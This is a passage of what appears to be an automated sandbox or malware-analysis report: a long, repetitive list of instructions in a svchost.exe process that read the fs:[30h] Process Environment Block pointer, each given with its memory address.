            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB4000 mov ecx, dword ptr fs:[00000030h]2_2_03BB4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5C073 mov eax, dword ptr fs:[00000030h]2_2_03B5C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32050 mov eax, dword ptr fs:[00000030h]2_2_03B32050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6050 mov eax, dword ptr fs:[00000030h]2_2_03BB6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B307AF mov eax, dword ptr fs:[00000030h]2_2_03B307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD678E mov eax, dword ptr fs:[00000030h]2_2_03BD678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B347FB mov eax, dword ptr fs:[00000030h]2_2_03B347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B347FB mov eax, dword ptr fs:[00000030h]2_2_03B347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B527ED mov eax, dword ptr fs:[00000030h]2_2_03B527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B527ED mov eax, dword ptr fs:[00000030h]2_2_03B527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B527ED mov eax, dword ptr fs:[00000030h]2_2_03B527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBE7E1 mov eax, dword ptr fs:[00000030h]2_2_03BBE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3C7C0 mov eax, dword ptr fs:[00000030h]2_2_03B3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB07C3 mov eax, dword ptr fs:[00000030h]2_2_03BB07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6273C mov eax, dword ptr fs:[00000030h]2_2_03B6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6273C mov ecx, dword ptr fs:[00000030h]2_2_03B6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6273C mov eax, dword ptr fs:[00000030h]2_2_03B6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAC730 mov eax, dword ptr fs:[00000030h]2_2_03BAC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C720 mov eax, dword ptr fs:[00000030h]2_2_03B6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C720 mov eax, dword ptr fs:[00000030h]2_2_03B6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30710 mov eax, dword ptr fs:[00000030h]2_2_03B30710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B60710 mov eax, dword ptr fs:[00000030h]2_2_03B60710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C700 mov eax, dword ptr fs:[00000030h]2_2_03B6C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38770 mov eax, dword ptr fs:[00000030h]2_2_03B38770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40770 mov eax, dword ptr fs:[00000030h]2_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30750 mov eax, dword ptr fs:[00000030h]2_2_03B30750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBE75D mov eax, dword ptr fs:[00000030h]2_2_03BBE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72750 mov eax, dword ptr fs:[00000030h]2_2_03B72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72750 mov eax, dword ptr fs:[00000030h]2_2_03B72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB4755 mov eax, dword ptr fs:[00000030h]2_2_03BB4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6674D mov esi, dword ptr fs:[00000030h]2_2_03B6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6674D mov eax, dword ptr fs:[00000030h]2_2_03B6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6674D mov eax, dword ptr fs:[00000030h]2_2_03B6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B666B0 mov eax, dword ptr fs:[00000030h]2_2_03B666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C6A6 mov eax, dword ptr fs:[00000030h]2_2_03B6C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34690 mov eax, dword ptr fs:[00000030h]2_2_03B34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34690 mov eax, dword ptr fs:[00000030h]2_2_03B34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03BAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03BAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03BAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03BAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB06F1 mov eax, dword ptr fs:[00000030h]2_2_03BB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB06F1 mov eax, dword ptr fs:[00000030h]2_2_03BB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A6C7 mov ebx, dword ptr fs:[00000030h]2_2_03B6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A6C7 mov eax, dword ptr fs:[00000030h]2_2_03B6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E627 mov eax, dword ptr fs:[00000030h]2_2_03B4E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B66620 mov eax, dword ptr fs:[00000030h]2_2_03B66620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B68620 mov eax, dword ptr fs:[00000030h]2_2_03B68620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3262C mov eax, dword ptr fs:[00000030h]2_2_03B3262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72619 mov eax, dword ptr fs:[00000030h]2_2_03B72619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE609 mov eax, dword ptr fs:[00000030h]2_2_03BAE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B62674 mov eax, dword ptr fs:[00000030h]2_2_03B62674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF866E mov eax, dword ptr fs:[00000030h]2_2_03BF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF866E mov eax, dword ptr fs:[00000030h]2_2_03BF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A660 mov eax, dword ptr fs:[00000030h]2_2_03B6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A660 mov eax, dword ptr fs:[00000030h]2_2_03B6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4C640 mov eax, dword ptr fs:[00000030h]2_2_03B4C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B545B1 mov eax, dword ptr fs:[00000030h]2_2_03B545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B545B1 mov eax, dword ptr fs:[00000030h]2_2_03B545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB05A7 mov eax, dword ptr fs:[00000030h]2_2_03BB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB05A7 mov eax, dword ptr fs:[00000030h]2_2_03BB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB05A7 mov eax, dword ptr fs:[00000030h]2_2_03BB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E59C mov eax, dword ptr fs:[00000030h]2_2_03B6E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32582 mov eax, dword ptr fs:[00000030h]2_2_03B32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32582 mov ecx, dword ptr fs:[00000030h]2_2_03B32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B64588 mov eax, dword ptr fs:[00000030h]2_2_03B64588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03B5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B325E0 mov eax, dword ptr fs:[00000030h]2_2_03B325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C5ED mov eax, dword ptr fs:[00000030h]2_2_03B6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C5ED mov eax, dword ptr fs:[00000030h]2_2_03B6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B365D0 mov eax, dword ptr fs:[00000030h]2_2_03B365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03B6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03B6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E5CF mov eax, dword ptr fs:[00000030h]2_2_03B6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E5CF mov eax, dword ptr fs:[00000030h]2_2_03B6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]2_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]2_2_03B5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC6500 mov eax, dword ptr fs:[00000030h]2_2_03BC6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]2_2_03C04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6656A mov eax, dword ptr fs:[00000030h]2_2_03B6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6656A mov eax, dword ptr fs:[00000030h]2_2_03B6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6656A mov eax, dword ptr fs:[00000030h]2_2_03B6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38550 mov eax, dword ptr fs:[00000030h]2_2_03B38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38550 mov eax, dword ptr fs:[00000030h]2_2_03B38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B644B0 mov ecx, dword ptr fs:[00000030h]2_2_03B644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBA4B0 mov eax, dword ptr fs:[00000030h]2_2_03BBA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B364AB mov eax, dword ptr fs:[00000030h]2_2_03B364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B304E5 mov ecx, dword ptr fs:[00000030h]2_2_03B304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A430 mov eax, dword ptr fs:[00000030h]2_2_03B6A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E420 mov eax, dword ptr fs:[00000030h]2_2_03B2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E420 mov eax, dword ptr fs:[00000030h]2_2_03B2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E420 mov eax, dword ptr fs:[00000030h]2_2_03B2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C427 mov eax, dword ptr fs:[00000030h]2_2_03B2C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B68402 mov eax, dword ptr fs:[00000030h]2_2_03B68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B68402 mov eax, dword ptr fs:[00000030h]2_2_03B68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B68402 mov eax, dword ptr fs:[00000030h]2_2_03B68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5A470 mov eax, dword ptr fs:[00000030h]2_2_03B5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5A470 mov eax, dword ptr fs:[00000030h]2_2_03B5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5A470 mov eax, dword ptr fs:[00000030h]2_2_03B5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBC460 mov ecx, dword ptr fs:[00000030h]2_2_03BBC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2645D mov eax, dword ptr fs:[00000030h]2_2_03B2645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5245A mov eax, dword ptr fs:[00000030h]2_2_03B5245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40BBE mov eax, dword ptr fs:[00000030h]2_2_03B40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40BBE mov eax, dword ptr fs:[00000030h]2_2_03B40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38BF0 mov eax, dword ptr fs:[00000030h]2_2_03B38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38BF0 mov eax, dword ptr fs:[00000030h]2_2_03B38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38BF0 mov eax, dword ptr fs:[00000030h]2_2_03B38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5EBFC mov eax, dword ptr fs:[00000030h]2_2_03B5EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBCBF0 mov eax, dword ptr fs:[00000030h]2_2_03BBCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDEBD0 mov eax, dword ptr fs:[00000030h]2_2_03BDEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B50BCB mov eax, dword ptr fs:[00000030h]2_2_03B50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B50BCB mov eax, dword ptr fs:[00000030h]2_2_03B50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B50BCB mov eax, dword ptr fs:[00000030h]2_2_03B50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30BCD mov eax, dword ptr fs:[00000030h]2_2_03B30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30BCD mov eax, dword ptr fs:[00000030h]2_2_03B30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30BCD mov eax, dword ptr fs:[00000030h]2_2_03B30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5EB20 mov eax, dword ptr fs:[00000030h]2_2_03B5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5EB20 mov eax, dword ptr fs:[00000030h]2_2_03B5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF8B28 mov eax, dword ptr fs:[00000030h]2_2_03BF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF8B28 mov eax, dword ptr fs:[00000030h]2_2_03BF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2CB7E mov eax, dword ptr fs:[00000030h]2_2_03B2CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC6B40 mov eax, dword ptr fs:[00000030h]2_2_03BC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC6B40 mov eax, dword ptr fs:[00000030h]2_2_03BC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFAB40 mov eax, dword ptr fs:[00000030h]2_2_03BFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD8B42 mov eax, dword ptr fs:[00000030h]2_2_03BD8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38AA0 mov eax, dword ptr fs:[00000030h]2_2_03B38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38AA0 mov eax, dword ptr fs:[00000030h]2_2_03B38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B86AA4 mov eax, dword ptr fs:[00000030h]2_2_03B86AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B68A90 mov edx, dword ptr fs:[00000030h]2_2_03B68A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04A80 mov eax, dword ptr fs:[00000030h]2_2_03C04A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6AAEE mov eax, dword ptr fs:[00000030h]2_2_03B6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6AAEE mov eax, dword ptr fs:[00000030h]2_2_03B6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30AD0 mov eax, dword ptr fs:[00000030h]2_2_03B30AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B64AD0 mov eax, dword ptr fs:[00000030h]2_2_03B64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B64AD0 mov eax, dword ptr fs:[00000030h]2_2_03B64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B86ACC mov eax, dword ptr fs:[00000030h]2_2_03B86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B86ACC mov eax, dword ptr fs:[00000030h]2_2_03B86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B86ACC mov eax, dword ptr fs:[00000030h]2_2_03B86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B54A35 mov eax, dword ptr fs:[00000030h]2_2_03B54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B54A35 mov eax, dword ptr fs:[00000030h]2_2_03B54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6CA38 mov eax, dword ptr fs:[00000030h]2_2_03B6CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6CA24 mov eax, dword ptr fs:[00000030h]2_2_03B6CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5EA2E mov eax, dword ptr fs:[00000030h]2_2_03B5EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBCA11 mov eax, dword ptr fs:[00000030h]2_2_03BBCA11
